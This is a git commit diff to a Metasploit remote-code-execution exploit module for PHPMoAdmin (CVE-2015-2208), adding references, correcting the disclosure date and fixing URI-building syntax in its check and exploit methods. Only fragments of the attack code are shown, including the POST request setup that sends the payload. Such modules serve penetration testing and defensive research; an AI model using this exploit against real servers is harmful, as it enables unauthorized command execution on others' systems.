Update phpmoadmin_exec.rb

Changes:
Added new URL;
Added CVE number;
Corrected the disclosure date;
Corrected the normalize_uri() function syntax.
bug/bundler_fix
Ricardo Almeida 2015-03-04 21:31:44 +00:00
parent 4d67e0e1bb
commit c19895ac85
1 changed files with 5 additions and 3 deletions

View File

@ -22,6 +22,8 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
[ 'CVE', '2015-2208' ],
[ 'URL', 'http://www.exploit-db.com/exploits/36251/' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Mar/19' ], [ 'URL', 'http://seclists.org/fulldisclosure/2015/Mar/19' ],
[ 'URL', 'http://seclists.org/oss-sec/2015/q1/743' ] [ 'URL', 'http://seclists.org/oss-sec/2015/q1/743' ]
], ],
@ -32,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ [
[ 'PHPMoAdmin', { } ], [ 'PHPMoAdmin', { } ],
], ],
'DisclosureDate' => 'Mar 04 2015', 'DisclosureDate' => 'Mar 03 2015',
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
register_options( register_options(
@ -43,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
def check def check
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s+'moadmin.php'), 'uri' => normalize_uri(target_uri.to_s,'moadmin.php'),
'method' => 'POST', 'method' => 'POST',
'vars_post' => 'vars_post' =>
{ {
@ -63,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Executing payload...") print_status("Executing payload...")
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s+'moadmin.php'), 'uri' => normalize_uri(target_uri.to_s,'moadmin.php'),
'method' => 'POST', 'method' => 'POST',
'vars_post' => 'vars_post' =>
{ {